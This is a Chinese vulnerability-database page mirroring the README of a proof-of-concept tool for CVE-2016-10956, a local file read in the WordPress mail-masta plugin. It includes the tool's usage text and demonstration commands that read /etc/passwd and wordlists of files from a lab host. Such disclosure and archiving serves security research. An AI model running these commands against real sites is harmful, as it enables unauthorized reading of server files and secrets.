漏洞平台

POC详情： 7ac8f67562ba0104cad55cf9cfd2aaf13371200f

来源

https://github.com/p0dalirius/CVE-2016-10956-mail-masta

关联漏洞

标题： WordPress mail-masta插件输入验证错误漏洞 (CVE-2016-10956)
描述：WordPress是WordPress基金会的一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。mail-masta是使用在其中的一个电子邮件插件。 WordPress mail-masta插件1.0版本中存在输入验证错误漏洞。该漏洞源于网络系统或产品未对输入的数据进行正确的验证。

描述

MailMasta wordpress plugin Local File Inclusion vulnerability (CVE-2016-10956)

介绍

# Mail Masta - Local File Read (CVE-2016-10956)

<p align="center">
  <img alt="GitHub release (latest by date)" src="https://img.shields.io/github/v/release/p0dalirius/CVE-2016-10956_mail_masta">
  <a href="https://twitter.com/intent/follow?screen_name=podalirius_" title="Follow"><img src="https://img.shields.io/twitter/follow/podalirius_?label=Podalirius&style=social"></a>
  <a href="https://www.youtube.com/c/Podalirius_?sub_confirmation=1" title="Subscribe"><img alt="YouTube Channel Subscribers" src="https://img.shields.io/youtube/channel/subscribers/UCF_x5O7CSfr82AfNVTKOv_A?style=social"></a>
  <br>
</p>


The mail-masta plugin 1.0 for WordPress has local file read in `count_of_send.php` and `csvexport.php`.

![](./.github/3.png)

## Usage

```
$ ./CVE-2016-10956_mail_masta.py -h
[+] Mail Masta - Local File Read (CVE-2016-10956)

usage: CVE-2016-10956_mail_masta.py [-h] [-v] [-s] -t TARGET_URL [-f FILE | -F FILELIST] [-D DUMP_DIR] [-k] [-r]

Description message

optional arguments:
  -h, --help            show this help message and exit
  -v, --verbose         Verbose mode
  -s, --only-success    Only print successful read file attempts.
  -t TARGET_URL, --target TARGET_URL
                        URL of the wordpress to connect to.
  -f FILE, --file FILE  Remote file to read.
  -F FILELIST, --filelist FILELIST
                        File containing a list of paths to files to read remotely.
  -D DUMP_DIR, --dump-dir DUMP_DIR
                        Directory where the dumped files will be stored.
  -k, --insecure        Allow insecure server connections when using SSL (default: False)
  -r, --raw             Raw dump of the file without php base64 wrapper (default: False)

```

## Demonstration

### Read a specific remote file

```
./CVE-2016-10956_mail_masta.py -t http://192.168.56.106/wp/ -f /etc/passwd
```

![](./.github/1.png)

### Read specific remote files from a wordlist

```
./CVE-2016-10956_mail_masta.py -t http://192.168.56.106/wp/ -F wordlist
```

![](./.github/3.png)

### Read specific remote files from a wordlist and only printing found files

```
./CVE-2016-10956_mail_masta.py -t http://192.168.56.106/wp/ -F wordlist --only-success
```

![](./.github/4.png)

## References
 - https://nvd.nist.gov/vuln/detail/CVE-2016-10956
 - https://cxsecurity.com/issue/WLB-2016080220
 - https://wordpress.org/plugins/mail-masta/#developers
 - https://wpvulndb.com/vulnerabilities/8609

文件快照


 [4.0K]  /data/pocs/7ac8f67562ba0104cad55cf9cfd2aaf13371200f
├── [4.2K]  CVE-2016-10956_mail_masta.py
├── [4.0K]  poc_environnement
│   ├── [ 843]  Dockerfile
│   ├── [ 151]  Makefile
│   ├── [1.6M]  plugin-mail-masta-1.0.zip
│   └── [ 536]  wpscan.txt
└── [2.4K]  README.md

1 directory, 6 files

神龙机器人已为您缓存

备注

1. 建议优先通过来源进行访问。

2. 如果因为来源失效或无法访问，请发送邮箱到 f.jinxu#gmail.com 索取本地快照（把 # 换成 @）。

3. 神龙已为您对POC代码进行快照，为了长期维护，请考虑为本地POC付费，感谢您的支持。